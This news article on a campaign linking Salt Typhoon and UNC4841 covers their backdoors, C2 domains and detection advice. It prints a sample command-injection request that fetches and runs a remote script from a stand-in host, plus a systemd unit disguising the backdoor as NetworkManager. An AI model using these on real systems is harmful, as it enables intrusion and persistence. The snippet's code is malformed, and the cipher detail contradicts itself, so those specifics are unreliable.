Chinese Salt Typhoon and UNC4841 Hackers Teamed Up to Attack Government and Corporate Infrastructure

Cybersecurity researchers began tracking a sophisticated campaign in the closing months of 2024, targeting both government and corporate networks across multiple continents.

The threat actors behind this operation, known colloquially as Salt Typhoon and UNC4841, leveraged overlapping infrastructure and shared tactics to maximize stealth and persistence.

Initial infiltration was achieved through exploitation of unpatched remote code execution vulnerabilities in public-facing servers, followed by the deployment of bespoke backdoors.

Affected organizations reported anomalous DNS queries and unexplained outbound HTTPS traffic to domains such as pulseathermakf[.]com and infraredsen[.]com, which were later attributed to Salt Typhoon’s command-and-control (C2) network.

Silent Push analysts noted that the adversaries’ infection vector often began with exploitation of a zero-day flaw in enterprise email gateways.

In one documented incident, UNC4841 exploited CVE-2023-2868 in the Barracuda Email Security Gateway Appliance to establish initial access.

Post-exploitation, the attackers uploaded a customized rootkit named Demodex, which facilitated kernel-level persistence and evasion of host-based detection mechanisms.

Around this same time, Salt Typhoon deployed two additional backdoors—Snappybee and Ghostspider—each designed to blend into legitimate traffic patterns by communicating over standard ports and using randomized HTTP headers to avoid signature-based detection.

Silent Push researchers identified the convergence of these two groups when domain registration records revealed shared email registrants and SOA mbox entries tied to gibberish ProtonMail addresses.

This infrastructure overlap suggested a coordinated effort or resource sharing between the two APT clusters.

By correlating WHOIS data with DNS A-record lookups, analysts uncovered over 45 previously unreported domains associated with both threat actors, expanding the known indicator set for proactive defense measures.

Infection and Persistence Mechanisms

The infection chain begins with a crafted HTTP request exploiting vulnerable software modules. A proof-of-concept snippet provided by Silent Push illustrates the exploit’s delivery payload:-

import requests

exploit_url = "https://victim.example.com/api/exec?cmd="
payload = "wget http://malicious.server/ghostspider.sh -O- | sh"
response = requests. Get(exploit_url + payload)
print("Exploit delivered, status:", response.status_code)

Upon successful exploitation, the Ghostspider backdoor script installs as a system service under a randomized name.

The service unit file, discovered on compromised hosts, resembles:-

[Unit]
Description=NetworkManager Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/ghostspider --config /etc/ghostspider.conf

[Install]
WantedBy=multi-user.target

This technique ensures automatic execution on boot, while /etc/ghostspider.conf contains encrypted C2 endpoints and sleep timers to throttle network beacons.

To further evade detection, the attackers implemented a dual-layer persistence tactic: first via the service unit and then through a cron job that monitors and restarts the backdoor if terminated.

Silent Push analysts extracted the decryption routine from memory, revealing a lightweight XOR cipher applied to both configuration files and network traffic payloads.

The cipher key, 0x4F, is hard-coded but dynamically rotated every 120 hours, preventing simple static analysis.

The seamless integration of these infection and persistence tactics underscores the advanced capabilities of Salt Typhoon and UNC4841.

Organizations are urged to audit DNS and WHOIS telemetry for known malicious domains and deploy behavior-based detection to identify anomalous process launches and encrypted C2 traffic.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.